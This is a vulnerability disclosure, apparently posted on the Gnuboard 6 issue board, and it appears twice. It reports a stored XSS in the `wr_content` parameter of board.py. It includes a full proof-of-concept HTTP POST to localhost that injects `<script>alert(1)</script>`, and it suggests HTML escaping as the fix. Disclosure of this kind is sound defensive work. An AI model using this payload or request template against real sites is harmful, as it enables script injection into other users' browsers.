Hello.
Currently, there is a writing vulnerability using the <script> tag when writing Gnubord g6 comments.
### [Name of affected Product]
gnuboard 6
### [Affected version]
https://github.com/gnuboard/g6/commit/f5dd7b84c4bc943c53c3f8b7096de508ae2e7c38
### [Vulnerability Type]
* Stored XSS
### [Affected Component]
board.py, All of posts
### [Root Cause]
* While writing reply on a post, `wr_content` parameter is not sanitized html tags, so when posting reply with a HTML tag caused Stored XSS attack.
### [Attack Vectors]
https://github.com/gnuboard/g6/assets/25397908/1eb09079-f94e-4034-842a-b50a1ae32baa
As shown in the video above, the `wr_content` web parameter can be arbitrarily modified using HTML tags when writing, and when the `<script>` tag is inserted, a Stored XSS attack is normally possible.
It seems necessary to check and modify the script tag directly within the `write_update` function in `board.py` or to process HTML escaping.
The below is the PoC Web request.
```
POST /board/write_update/free? HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 1792
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySgFBdm7sWhgsJGVH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8000/board/write/free
Accept-Encoding: gzip, deflate, br
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ck_visit_ip=127.0.0.1; session=eyJpc19tb2JpbGUiOiBmYWxzZSwgInNzX3Rva2VuIjogIjhkNzgyMWMwZGI5MzUzZjg4MWFkOTRkZDVmZjJiYzhkIn0=.ZahUdQ.BiPBCxMiQMixJW06yEnmBeE4zGw
Connection: close
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="uid"
2024011717272327
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_id"
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="parent_id"
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="token"
8d7821c0db9353f881ad94dd5ff2bc8d
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_name"
test
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_password"
tes
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_email"
ttes@naver.com
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_homepage"
tetest
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="html"
html1
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_subject"
set
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_content"
<p>settt</p><script>alert(1)</script>
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="option"
html2
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_link1"
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_link2"
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="bf_file[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="bf_file[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarySgFBdm7sWhgsJGVH--
```
Currently, there is a writing vulnerability using the <script> tag when writing Gnubord g6 comments.
### [Name of affected Product]
gnuboard 6
### [Affected version]
https://github.com/gnuboard/g6/commit/f5dd7b84c4bc943c53c3f8b7096de508ae2e7c38
### [Vulnerability Type]
* Stored XSS
### [Affected Component]
board.py, All of posts
### [Root Cause]
* While writing reply on a post, `wr_content` parameter is not sanitized html tags, so when posting reply with a HTML tag caused Stored XSS attack.
### [Attack Vectors]
https://github.com/gnuboard/g6/assets/25397908/1eb09079-f94e-4034-842a-b50a1ae32baa
As shown in the video above, the `wr_content` web parameter can be arbitrarily modified using HTML tags when writing, and when the `<script>` tag is inserted, a Stored XSS attack is normally possible.
It seems necessary to check and modify the script tag directly within the `write_update` function in `board.py` or to process HTML escaping.
The below is the PoC Web request.
```
POST /board/write_update/free? HTTP/1.1
Host: 127.0.0.1:8000
Content-Length: 1792
Cache-Control: max-age=0
sec-ch-ua: "Not_A Brand";v="8", "Chromium";v="120"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySgFBdm7sWhgsJGVH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8000/board/write/free
Accept-Encoding: gzip, deflate, br
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: ck_visit_ip=127.0.0.1; session=eyJpc19tb2JpbGUiOiBmYWxzZSwgInNzX3Rva2VuIjogIjhkNzgyMWMwZGI5MzUzZjg4MWFkOTRkZDVmZjJiYzhkIn0=.ZahUdQ.BiPBCxMiQMixJW06yEnmBeE4zGw
Connection: close
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="uid"
2024011717272327
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_id"
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="parent_id"
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="token"
8d7821c0db9353f881ad94dd5ff2bc8d
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_name"
test
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_password"
tes
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_email"
ttes@naver.com
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_homepage"
tetest
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="html"
html1
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_subject"
set
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_content"
<p>settt</p><script>alert(1)</script>
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="option"
html2
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_link1"
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="wr_link2"
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="bf_file[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarySgFBdm7sWhgsJGVH
Content-Disposition: form-data; name="bf_file[]"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarySgFBdm7sWhgsJGVH--
```
댓글 3개
게시판 목록
그누보드6 이슈
좋은 댓글과 좋아요는 제작자에게 큰힘이 됩니다.
| 번호 | 제목 | 글쓴이 | 날짜 | 조회 |
|---|---|---|---|---|
| 74 |
seiblog-nandsoft
|
1년 전 | 181 | |
| 73 |
seiblog-nandsoft
|
1년 전 | 167 | |
| 72 |
supwayb
|
1년 전 | 330 | |
| 71 |
supwayb
|
1년 전 | 281 | |
| 70 |
dungdang39
|
1년 전 | 264 | |
| 69 |
dungdang39
|
1년 전 | 309 | |
| 68 |
supwayb
|
1년 전 | 236 | |
| 67 |
supwayb
|
1년 전 | 254 | |
| 66 |
supwayb
|
1년 전 | 256 | |
| 65 |
kagla
|
1년 전 | 265 | |
| 64 |
kagla
|
1년 전 | 200 | |
| 63 |
kagla
|
1년 전 | 194 | |
| 62 |
seiblog-nandsoft
|
1년 전 | 218 | |
| 61 |
supwayb
|
1년 전 | 293 | |
| 60 |
seiblog-nandsoft
|
1년 전 | 206 | |
| 59 |
seiblog-nandsoft
|
1년 전 | 191 | |
| 58 |
supwayb
|
1년 전 | 262 | |
| 57 |
supwayb
|
1년 전 | 302 | |
| 56 |
supwayb
|
1년 전 | 198 | |
| 55 |
kagla
|
1년 전 | 193 |
댓글 작성
댓글을 작성하시려면 로그인이 필요합니다.
로그인하기